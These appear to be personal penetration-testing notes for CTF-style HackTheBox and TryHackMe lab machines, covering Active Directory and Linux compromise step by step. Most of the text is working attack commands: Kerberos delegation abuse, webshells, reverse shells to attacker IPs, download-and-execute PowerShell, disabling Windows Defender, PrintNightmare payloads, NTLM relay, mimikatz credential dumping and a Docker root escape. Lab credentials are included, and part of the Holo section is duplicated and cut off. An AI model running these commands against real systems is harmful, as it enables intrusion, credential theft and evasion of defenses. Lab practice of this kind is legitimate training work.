=====Performing a S4U Attack=====
'Service for User' attack (S4U2self to get a ticket for Administrator to our own service, then S4U2proxy to turn it into a service ticket for the DC); this is constrained-delegation (RBCD) abuse, not unconstrained delegation
`.\rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb` copy the 'rc4_hmac' value (the NT hash of the machine account password), then generate a ticket for Administrator
`.\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt`
save the base64 ticket that Rubeus prints for 'Administrator' (the final S4U2proxy ticket) as ticket.kirbi.b64 on kali
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass` (the hostname must match the SPN in the ticket and resolve, e.g. via /etc/hosts, and kali's clock must be within 5 minutes of the DC, otherwise Kerberos fails with KRB_AP_ERR_SKEW)
*****[Resource Based Constrained Delegation] 0xdf:
First I’ll add a fake computer to the domain under my control.
Then I can act as the DC to request Kerberos tickets for the fake computer giving the ability to impersonate other accounts(Administrator).
For this to work, I’ll need an authenticated user who can add machines to the domain (by default, any user can add up to 10).
This is configured in the ms-ds-machineaccountquota attribute, which needs to be larger than 0.
Finally, I need write privileges over a domain joined computer (which GenericALL on the DC gets me.)
upload the 3 tools, and load 2, `. ./PowerView.ps1` `. ./Powermad.ps1`
`Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota` check if value greater than 0
`Get-DomainController | select name,osversion | fl` check that the OS is Windows Server 2012 or later, since RBCD only exists from 2012 on (here it is 2022)
`Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl` check if value is empty
=====Create FakeComputer=====
`New-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString '0xdf0xdf123' -AsPlainText -Force)`
`$fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid`
`$fakesid` check it's assigned
=====Configure the DC to trust my fake computer to make authorization decisions on its behalf=====
`$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"`
`$SDBytes = New-Object byte[] ($SD.BinaryLength)`
`$SD.GetBinaryForm($SDBytes, 0)`
`Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}` (0xdf keeps the target in a variable, $TargetComputer = 'DC'; the DC is the target here)
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check that the SecurityIdentifier is the SID of 0xdfFakeComputer$ ($fakesid) and AceType is AccessAllowed
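Added example (not from the page, not from PowerView or 0xdf's writeup): a pure-Python builder and parser for the self-relative security descriptor stored in msds-allowedtoactonbehalfofotheridentity. It does what `New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$fakesid)"` plus GetBinaryForm do in the 0xdf steps, and what the $Descriptor.DiscretionaryAcl check does in both walkthroughs: feed parse_descriptor() the raw bytes pulled with Get-DomainComputer and confirm the ACE trustee is the fake computer's SID with mask 0xF01FF. The fake-computer SID in the test is constructed.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor.
Added example: stdlib only, offline, independent of PowerView/Powermad."""
import struct

# SDDL two-letter access rights -> ACCESS_MASK bits for directory-service objects.
SDDL_RIGHTS = {
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100, "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000,
    "WO": 0x00080000,
}
ACCESS_ALLOWED_ACE_TYPE = 0x00      # "A" in SDDL, AceType AccessAllowed in PowerShell
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"   # "BA", the owner used in the SDDL on the page


def sddl_rights_to_mask(rights: str) -> int:
    """'CCDCLCSWRPWPDTLOCRSDRCWDWO' -> 0xF01FF, the mask PowerShell writes into the ACE."""
    if len(rights) % 2:
        raise ValueError("SDDL rights must be two-letter tokens")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID (revision, count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string")
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes, off: int = 0):
    """Return (sid_string, byte_length) of the SID that starts at buf[off]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(allowed_sid: str, rights: str = "CCDCLCSWRPWPDTLOCRSDRCWDWO") -> bytes:
    """Self-relative SD equal to SDDL 'O:BAD:(A;;<rights>;;;<allowed_sid>)'."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    trustee = sid_to_bytes(allowed_sid)
    # ACE: type, flags, size, mask, then the trustee SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(trustee),
                      sddl_rights_to_mask(rights)) + trustee
    # ACL: revision 2 is enough for plain ACCESS_ALLOWED ACEs (4 is only needed for object ACEs)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace
    owner_off = 20                        # header is 20 bytes
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, 0, 0, dacl_off)  # owner, group, sacl, dacl offsets
    return header + owner + acl


def parse_descriptor(raw: bytes) -> dict:
    """{'owner': sid, 'aces': [(ace_type, mask, trustee_sid), ...]} from a self-relative SD.
    This is the check done with $Descriptor.DiscretionaryAcl on the page."""
    _rev, _sbz, control, owner_off, _group_off, _sacl_off, dacl_off = struct.unpack_from("<BBHIIII", raw, 0)
    result = {"owner": bytes_to_sid(raw, owner_off)[0] if owner_off else None, "aces": []}
    if control & SE_DACL_PRESENT and dacl_off:
        _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", raw, dacl_off)
        pos = dacl_off + 8
        for _ in range(ace_count):
            ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", raw, pos)
            sid, _ = bytes_to_sid(raw, pos + 8)
            result["aces"].append((ace_type, mask, sid))
            pos += ace_size
    return result


if __name__ == "__main__":
    fake_sid = "S-1-5-21-1677581083-3380853377-188903654-5101"   # constructed, not a real SID
    raw = build_rbcd_descriptor(fake_sid)
    print(raw.hex())
    print(parse_descriptor(raw))
```

To check a live value, dump the attribute with `Get-DomainComputer DC -Properties msds-allowedtoactonbehalfofotheridentity`, save the byte array, and pass it to parse_descriptor(); an empty result means RBCD is not yet configured, one ACE with type 0 and the fake computer's SID means the Set-ADComputer / Set-DomainObject step worked.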
If rerun bloodhound, we can see '0xdfFakeComputer.support.htb' computer_object now has 'AllowToAct' over 'dc.support.htb' computer_object
=====Auth as Fake Computer=====
`.\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb` copy 'rc4_hmac' value
=====get ticket=====
`.\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt`
`.\Rubeus.exe klist`
=====use ticket on kali=====
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass`
Initial_Foothold
`crackmapexec smb dc01.timelapse.htb --shares -u 0xdf -p ''`
`smbclient -N //dc01.timelapse.htb/Shares` smb: \dev\> get winrm_backup.zip
`zip2john winrm_backup.zip > winrm_backup.zip.hash`
`john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash` password: supremelegacy
`unzip -P supremelegacy winrm_backup.zip` got file: legacyy_dev_auth.pfx
https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
`pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash` tee will save the output and display it at same time
`john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash` password: thuglegacy (this will be the 'import password')
`openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc` enter the import password, then set a PEM pass phrase for the exported key (must be at least 4 chars)
`openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key` decrypt it so that we never have to remember the PEM_pass
`openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt`
`evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt` -S enables SSL and connects to 5986 instead of 5985 (certificate-based WinRM auth only works over the HTTPS listener)
Privilege_escalation(legacyy->svc_deploy)
winpeas.exe found cred svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV in C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
`evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S`
'svc_deploy' user is in the 'LAPS_Readers' group (`net user` prints group memberships with a leading *). LAPS = Local Administrator Password Solution; members can read the local Administrator password LAPS stores in the ms-mcs-admpwd attribute of each computer object
google found me https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/ous/laps/ but I have never tried it: `Get-AdmPwdPassword –ComputerName dc01`
0xdf use: `Get-ADComputer DC01 -property 'ms-mcs-admpwd'` got ms-mcs-admpwd: uM[3va(s870g6Y]9i]6tMu{j
ippsec use: https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS
`upload AdmPwd.PS`
`Find-AdmPwdExtendedRights -identity *` check what objects can manage the LAPS
`Find-AdmPwdExtendedRights -identity 'Domain Controllers' | select-object ExtendedRightHolders` output shows only 3 groups: SYSTEM, Domain_Admins, LAPS_Readers
`get-admpwdpassword -computername dc01 | Select password` got password: /1B@QZe3{BAAwzs%KY$pTb7d
`evil-winrm -i 10.10.11.152 -u administrator -p '/1B@QZe3{BAAwzs%KY$pTb7d' -S`
Initial_Foothold
nmap found 3690/tcp open svnserve Subversion
Failed(link_expired): http://www.gcf.dkf.unibe.ch/BCB/files/BCB_Subversion_Cheat_Sheet.pdf
https://www.cheat-sheets.org/saved-copy/subversion-cheat-sheet-v1.pdf
`svn checkout svn://10.10.10.203` this will copy the repo to local
`svn log` shows there were 5 commits, enum them one by one -r 1 .. -r 5
`svn update -r 2` found 'deploy.ps1' was 'A' added, found cred nathen:wendel98
`svn update -r 5` found 'moved.txt' was 'A' added, found http://devops.worker.htb
`wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.10.203 -H 'Host: FUZZ.worker.htb' --hh 703` found other subdomain
/etc/hosts 10.10.10.203 worker.htb alpha.worker.htb story.worker.htb devops.worker.htb cartoon.worker.htb lens.worker.htb dimension.worker.htb twenty.worker.htb solid-state.worker.htb spectral.worker.htb
login devops.worker.htb as nathen:wendel98 >>SmartHotel360>>pick a site(e.g. Alpha-CI), in Tasks tab we found [TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb']
Note: a pipeline is a series of commands to run, presumably to build the updated site and deploy it. We can create a pipeline and queue a build, but we cannot push to the master branch.
But we can create a new branch based on master, upload cmd.aspx to it and deploy (queue a build for Alpha-CI in the pipeline). Then we have a webshell at alpha.worker.htb/cmd.aspx
Privilege_escalation(iis->robisl)
`wmic logicaldisk get deviceid, volumename, description` and `powershell -c get-psdrive -psprovider filesystem` both shown there is a w: drive working
found a long list of users and passwords in W:\svnrepos\www\conf\passwd
0xdf: `net localgroup "Remote Management Users"` found user 'robisl'
ippsec: `crackmapexec winrm 10.10.10.203 -u users -p passwords --no-bruteforce` found robisl:wolves11
`evil-winrm -i 10.10.10.203 -u robisl -p wolves11`
Privilege_escalation(robisl->system)
login devops.worker.htb as robisl:wolves11
>>PartsUnlimited>>Project_Settings>Security>>Build_Administrators(group)>> found robisl, which has full control over pipelines in the project. we can create new build to run arbitrary commands
>>PartsUnlimited>>Project_Settings>Agent_pools>>Setup>>Agents>>Hamilton11>>Capabilities found USERNAME:WORKER$, i.e. the agent runs as the machine account, so any build we queue runs as SYSTEM on the box
0xdf:
create new pipeline>>Azure_Repos_Git>>PartsUnlimited>>starter_pipeline>>default yaml>>create_new_branch...(we can't commit to master branch)>>save&run failed(there is no pool name called 'Default')
found 'Setup' in Collection_Settings>>agent_pool, edit the yaml, inject payload under 'script:'
0xdf_payload: - script: c:\programdata\nc.exe -e cmd 10.10.14.24 443
listener get SYSTEM shell
ippsec:
create new pipeline>>Use_the_classic_editor>>continue(default)>>empty_pipeline>>choose 'Setup' in agent_pool>>add job 'Powershell'
ippsec_payload: net user cube Password123! /add ; net localgroup administrators cube /add
`evil-winrm -i 10.10.10.203 -u cube -p Password123!` got administrator shell
short_cut(iis->system)
iis user `whoami /priv` has 'SeImpersonatePrivilege Enabled'
c:\ProgramData>powershell -c wget http://10.10.14.24/RoguePotato.exe -outfile RoguePotato.exe
https://github.com/antonioCoco/RoguePotato?tab=readme-ov-file
Normal steps: root@kali# socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.203:9999
Normal steps: c:\ProgramData> echo c:\programdata\nc.exe -e cmd 10.10.14.24 443 > .\rev.bat
Normal steps: c:\ProgramData> .\RoguePotato.exe -r 10.10.14.24 -l 9999 -e C:\programdata\rev.bat
Fail_cause_1: Windows Defender will detect and delete RoguePotato.exe
Fail_cause_2: Target Firewall block any inbound connection except 80/tcp http, 3690/tcp svn, 5985/tcp wsman
0xdf solution:
countermeasure_1: download and execute in a single line so the binary runs before Defender's scan deletes it
countermeasure_2: use chisel forward kali:9999 to target:9999, which bypass the firewall
root@kali# ./chisel_1.6.0_linux_amd64 server -p 8000 --reverse
c:\ProgramData>.\chisel.exe client 10.10.14.24:8000 R:9999:localhost:9999
root@kali# socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999
c:\ProgramData>powershell -c wget 10.10.14.24/RoguePotato.exe -outfile r.exe; .\r.exe -r 10.10.14.24 -l 9999 -e C:\programdata\rev.bat
listener got SYSTEM shell
ALL Potatoes: https://jlajara.gitlab.io/Potatoes_Windows_Privesc
53 machine notes need to write
5 machine notes need to write
This network has been taken off the site, and it was not cheap ($30 for 30 days). Here are some steps.
https://medium.com/@hyphens443/tryhackme-active-directory-throwback-network-f5bbb0105f23
John Hammond video part1 length 5:52:44 https://www.youtube.com/watch?v=mQT38VR4boQ
John Hammond video part2 length 7:12:21 https://www.youtube.com/watch?v=ukFC48bzVSM
LLMNR and NBT-NS Poisoning. LLMNR(Link-local Multicast Name Resolution) NBT-NS(NetBIOS Name Service)
the attacker can obtain authentication data of a user who requested a non-existent resource.
`responder -I tun0 -rdw -v` when a user mistypes a hostname, Windows falls back to LLMNR/NBT-NS, responder answers, and we catch the NetNTLMv2 hash to crack
Email phishing with payload.exe
meterpreter_session `hashdump`, empire_agent [rubeus kerberoast /outfile:roast.hash]
pivoting use msf module post/multi/manage/autoroute
http://10.200.15.176/index.php timekeep user login: crackmapexec password spray got a login
setup msf module exploit/windows/misc/hta_server and upload payload.xlsm
enum windows defender command list:
sc.exe query windefend
#querying Windows Defender service
wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct
#anti-malware product detection
Get-Service | where {$_.DisplayName -Like "*Defender*"} | Select Status, DisplayName
#Services having Defender in Name.
Get-MpComputerStatus
Get-MpPreference
#Get a list of current configurations
Set-MpPreference -DisableRealtimeMonitoring $true
#disable real-time protection
Set-MpPreference -ExclusionPath C:\Users\Hacker
#exclude a location from real-time protection and scheduled scanning
Set-MpPreference -ExclusionExtension asp
#exclude a file type from being scanned
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $false
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true
PowerShell — ping sweeper: `1..255 | % {ping -n 1 -w 60 10.200.15.$_} | Select-String ttl`
PowerShell — Checking ARP Tables: `arp -a`
PowerShell — DNS querying: `[System.Net.Dns]::GetHostbyAddress("10.200.15.176")` `[System.Net.Dns]::GetHostAddresses("THROWBACK-DC01")`
......
Thanks to Mr Jokar https://medium.com/system-weakness/holo-network-writeup-tryhackme-lets-hack-active-directory-network-fea687dfa02f
once connected to the OpenVPN, `route` shows the 10.200.69.0/24 subnet via the 10.50.70.1 gateway (openvpn)
`nmap -sn -T4 -n 10.200.69.0/24` found .33 and .250
further nmap found 10.200.111.33[22,80,33060] 10.200.111.250[22,1337]
'gobuster vhost' or `ffuf -u http://10.200.69.33 -H "Host:FUZZ.holo.live" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 1288` found subdomain: dev www admin
admin.holo.live/robots.txt shows /var/www/admin/db.php /var/www/admin/dashboard.php /var/www/admin/supersecretdir/creds.txt
gobuster dir found dev.holo.live/talents.php and its source code have dev.holo.live/img.php?file=images/gura.jpg
LFI http://dev.holo.live/img.php?file=images/../../../../etc/passwd
LFI found cred admin:DBManagerLogin! http://dev.holo.live/img.php?file=images/../../../../var/www/admin/supersecretdir/creds.txt
login admin.holo.live redirect to /dashboard.php found hint $_GET['cmd'] in source code
the ?cmd param can also be found by `ffuf -b PHPSESSID=mur4v5tp7jhu400gs6l91qikbu -u http://admin.holo.live/dashboard.php\?FUZZ\=pwd -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 15869`
payload [/bin/bash -c "bash -i >& /dev/tcp//9001 0>&1"] got www-data shell
now we have 10.200.69.33 container www-data
/var/www/admin/db_connect.php found define('DB_SRV', '192.168.100.1');define('DB_PASSWD', "!123SecureAdminDashboard321!"); define('DB_USER', 'admin');define('DB_NAME', 'DashboardDB');
container `mysql -h 192.168.100.1 -u admin -p` with pass: !123SecureAdminDashboard321!
`show databases;` `use DashboardDB;` `show tables;` `select * from users;` found cred admin:DBManagerLogin! gurag:AAAA
linpeas show we are in a container, there is also a file /.dockerenv
`route` `arp -a` show gateway found subnet then container upload nmap.sh run `./nmap -sn -n 192.168.100.0/24`
kali set listener and container `nc kali_ip port` and kali received, means container can reach outside
kali `./chisel server -p 12000 --reverse` container `./chisel client 10.50.70.97:12000 R:socks &`
container `./nmap -p- 192.168.100.1 --min-rate 1000`
kali `proxychains -q nmap -sT -Pn -p 22,80,3306,8080,33060 -sC -sV -T5 192.168.100.1`
kali `proxychains -q mysql -h 192.168.100.1 -u admin -p` `select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';` (needs the FILE privilege and a secure_file_priv setting that does not restrict the path)
kali `proxychains -q curl http://192.168.100.1:8080/shell.php\?cmd\="whoami"`
now we have 10.200.69.33 www-data
linpeas found SUID -rwsr-xr-x 1 root root 85029736 Oct 14 2020 /usr/bin/docker
`docker image ls` found 'ubuntu 18.04' then `/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt bash`
read host file, crack 1 from /etc/shadow linux-admin:linuxrulez
add a uid=0 user into /etc/passwd and ssh as that user, we got host machine root
I mostly use: `echo 'username:$1$username$MkaiE3rS.z62Rvejgmc.Z/:0:0:root:/root:/bin/bash' >> /etc/passwd` (7 colon-separated fields: name:hash:uid:gid:gecos:home:shell; a 6-field line shifts home and shell one slot to the left)
note: `openssl passwd -1 -salt username password` got salted_hash part
now we have 10.200.69.33 root
besides using uploaded nmap binary we can use bash and nc
ping sweep on target
`for i in {1..255}; do (ping -c 1 192.168.100.$i | grep "bytes from" &);done`
`for i in {1..255}; do (ping -c 1 10.200.69.$i | grep "bytes from" &);done`
TTL 128 is Windows so .30 , .31 and .35 are windows machines.
TTL 64 is any type of Unix and Android so .33 and .250 are Unix.
TTL 255 or above is usually Cisco. So .1 is probably the Cisco router.
So .250 and .1 are out of our range because .1 is the router and .250 is the VPN Server.
port scan on target
`for port in {1..10000}; do (echo >/dev/tcp/10.200.69.30/$port) 2>/dev/null && echo "Port $port is open"; done` (pure bash, no nc needed; /dev/tcp is a bash feature, so run it with bash, not sh). Then banner-grab each open port: `nc -w 1 -v 10.200.69.30 $port </dev/null 2>&1 | grep -i 'succeeded\|banner\|title\|name\|version'`
but nmap is always more accurate: upload the nmap binary and `nmap 10.200.69.30,31,35 -Pn -n -T5`
pivot: switch from chisel (does not need ssh access) to sshuttle (no need to prefix commands with `proxychains`)
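Added example (not from the page or the Holo writeup): the same living-off-the-land recon in Python, for a pivot host that has python3 but no nmap binary. parse_ping_sweep() applies the TTL rule of thumb above to ping output, and scan() is a threaded TCP connect scanner like the /dev/tcp loop. The ping lines are constructed sample output, and demo_local_scan() proves the scanner against a loopback listener it opens itself.

```python
"""Ping-sweep TTL fingerprinting and a TCP connect scan without nmap.
Added example: stdlib only; run it with python3 on the pivot host."""
import re
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed sample replies from the `ping -c 1` sweep loop (not captured output).
SAMPLE_PING_OUTPUT = """\
64 bytes from 10.200.69.30: icmp_seq=1 ttl=128 time=0.71 ms
64 bytes from 10.200.69.31: icmp_seq=1 ttl=128 time=0.66 ms
64 bytes from 10.200.69.33: icmp_seq=1 ttl=64 time=0.39 ms
64 bytes from 10.200.69.1: icmp_seq=1 ttl=255 time=1.02 ms
"""

TTL_RE = re.compile(r"bytes from (\d+\.\d+\.\d+\.\d+).*?ttl=(\d+)", re.IGNORECASE)


def guess_os(ttl: int) -> str:
    """Initial TTL fingerprint: 64 Unix/Linux/Android, 128 Windows, 255 Cisco and similar gear.
    Every router hop decrements the TTL, so match against the nearest initial value above it."""
    if ttl <= 64:
        return "unix"
    if ttl <= 128:
        return "windows"
    return "cisco/network"


def parse_ping_sweep(output: str) -> dict:
    """{ip: os_guess} for every host that answered."""
    return {ip: guess_os(int(ttl)) for ip, ttl in TTL_RE.findall(output)}


def tcp_connect(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a full TCP handshake completes (same test as `echo >/dev/tcp/host/port`)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(host: str, ports, workers: int = 64) -> list:
    """Sorted list of open ports; threads keep the 1..10000 sweep to seconds, not minutes."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_connect(host, p)), ports))
    return sorted(p for p, is_open in results if is_open)


def demo_local_scan():
    """Self-contained check: listen on an ephemeral loopback port and scan a window around it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    try:
        return port, scan("127.0.0.1", range(port - 2, port + 3))
    finally:
        srv.close()


if __name__ == "__main__":
    for ip, os_guess in parse_ping_sweep(SAMPLE_PING_OUTPUT).items():
        print(ip, os_guess)
    listener, found = demo_local_scan()
    print("listener on", listener, "open ports found:", found)
```

Against the real network, replace the sample with the output of the ping loop and call scan("10.200.69.30", range(1, 10001)); connect scans complete the handshake, so expect them in the target's logs.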
`sshuttle -r username@10.200.69.33 10.200.69.0/24 192.168.100.0/24`
on .31 webpage if we click 'Forgot Password?' we can use the user_token hidden in the cookie to reset gurag password
after login, we found home.php is a simple image upload page, upload shell.php success
gobuster dir found /images http://10.200.95.31/images/shell.php?cmd=whoami and it's a system shell
now we have 10.200.69.31 system
upload mimikatz dump creds
`c:\windows\temp\mimikatzmine.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::lsa /patch" exit`
got cred watamet:Nothingtoworry!
`crackmapexec smb 10.200.95.30 10.200.95.35 -u users.txt -H hashes.txt`
got cred watamet:d8d41e6cf762a8c77776a1843d4141c9
`xfreerdp /u:watamet /p:Nothingtoworry! +clipboard /dynamic-resolution /cert:ignore /v:10.200.95.35 /drive:share,/opt/`
now we have 10.200.69.35 watamet
`bloodhound-python -c ALL --dns-tcp -u 'watamet@holo.live' -p 'Nothingtoworry!' --zip -ns 10.200.95.30 -d holo.live`
PS C:\Windows\System32\spool\drivers\color> iex(new-object net.webclient).downloadstring('http://10.50.74.163/PowerUp.ps1')
PS C:\Windows\System32\spool\drivers\color> Invoke-AllChecks
bloodhound and powerup both found nothing interesting
kali `impacket-rpcdump @10.200.95.35 | egrep 'MS-RPRN|MS-PAR'`
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
both Print Spooler RPC interfaces are exposed, so the target is a PrintNightmare candidate (confirmed by the exploit below)
CVE-2021-1675 - PrintNightmare LPE (PowerShell)
method_1 RCE
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.50.74.163 LPORT=9002 -f dll -o innocent.dll`
`rlwrap nc -lnvp 9002` `impacket-smbserver share -smb2support .`
https://github.com/cube0x0/CVE-2021-1675
`python3 CVE-2021-34527.py -d holo.live holo.live/watamet:Nothingtoworry!@10.200.69.35 --remote-dll '\\\\10.50.74.163\\share\\innocent.dll'`
method_2 Local Priv Esc
https://github.com/calebstewart/CVE-2021-1675
PS C:\Users\watamet> iex(new-object net.webclient).downloadstring('http://10.50.74.163/CVE-2021-1675.ps1')
PS C:\Users\watamet> Invoke-Nightmare
# if successful, the script creates a local administrator account admin:P@ssw0rd
now we have 10.200.69.35 administrator
NTLM Relay Attack Requirements:
1. A fully compromised machine in the AD
2. SMB signing disabled (not required) on the relay target. If the target requires signing, the relayed session is useless: kali sits in the middle and never learns the session key derived from the user's password, so it cannot sign messages and the target drops the connection.
3. kali is not in the target network, so we need a remote port forward so that SMB connections to .35:445 land on ntlmrelayx on kali
To confirm [SMB signing disabled]
method_1 `crackmapexec smb 10.200.95.30 10.200.95.32`
method_2 `nmap 10.200.95.30 -p 445 -sC -sV -sT -Pn`
method_3 `responder-RunFinger -f ips.txt`
To free port 445 on 10.200.69.35 for the port forward, shut down its SMB services (then reboot so the port is released)
`sc stop netlogon`
`sc stop lanmanserver`
`sc config lanmanserver start= disabled`
`sc stop lanmanworkstation`
`sc config lanmanworkstation start= disabled`
`shutdown -r`
To setup remote port forwarding on 10.200.69.35
method_1 meterpreter> portfwd add -R -L 0.0.0.0 -l 445 -p 445
method_2 kali# `./chisel server -p 12000 --reverse` 10.200.69.35> `./chisel client 10.50.70.97:12000 R:socks`
To setup relay on kali
`ntlmrelayx.py -t smb://10.200.111.30 -smb2support -socks` OR `impacket-ntlmrelayx`
To use the relayed session
`proxychains impacket-smbexec -no-pass HOLOLIVE/SRV-ADMIN@10.200.95.30` OR `smbexec.py`
Sequence: [a privileged user (SRV-ADMIN) somewhere in the domain connects to .35:445] [the port forward hands that SMB connection to ntlmrelayx on kali] [ntlmrelayx relays the NTLM authentication to .30, which accepts it because SMB signing is not required] [with -socks, ntlmrelayx keeps the authenticated SMB session to .30 open behind a local SOCKS proxy (127.0.0.1:1080)] [proxychains smbexec -no-pass rides that session, so no password is needed]
So... To my understanding, the .30(DC) is responding to its own NTLM challenge
now we have 10.200.69.30 system
`net user username password123! /add && net localgroup Administrators username /add`
`secretsdump.py holo.live/username@10.200.95.30`
once connected openvpn, `route` found 10.200.69.0/24 subnet from 10.50.70.1 gateway(openvpn)
`nmap -sn -T4 -n 10.200.69.0/24` found .33 and .250
further nmap found 10.200.111.33[22,80,33060] 10.200.111.250[22,1337]
'gobuster vhost' or `ffuf -u http://10.200.69.33 -H "Host:FUZZ.holo.live" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 1288` found subdomain: dev www admin
admin.holo.live/robots.txt shows /var/www/admin/db.php /var/www/admin/dashboard.php /var/www/admin/supersecretdir/creds.txt
gobuster dir found dev.holo.live/talents.php and its source code have dev.holo.live/img.php?file=images/gura.jpg
LFI http://dev.holo.live/img.php?file=images/../../../../etc/passwd
LFI found cred admin:DBManagerLogin! http://dev.holo.live/img.php?file=images/../../../../var/www/admin/supersecretdir/creds.txt
login admin.holo.live redirect to /dashboard.php found hint $_GET['cmd'] in source code
the ?cmd parm can also be found by `ffuf -b PHPSESSID=mur4v5tp7jhu400gs6l91qikbu -u http://admin.holo.live/dashboard.php\?FUZZ\=pwd -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 15869`
payload [/bin/bash -c "bash -i >& /dev/tcp/
now we have 10.200.69.33 container www-data
/var/www/admin/db_connect.php found define('DB_SRV', '192.168.100.1');define('DB_PASSWD', "!123SecureAdminDashboard321!"); define('DB_USER', 'admin');define('DB_NAME', 'DashboardDB');
container `mysql -h 192.168.100.1 -u admin -p` with pass: !123SecureAdminDashboard321!
`show databases;` `use DashboardDB;` `show tables;` `select * from users;` found cred admin:DBManagerLogin! gurag:AAAA
linpeas show we are in a container, there is also a file /.dockerenv
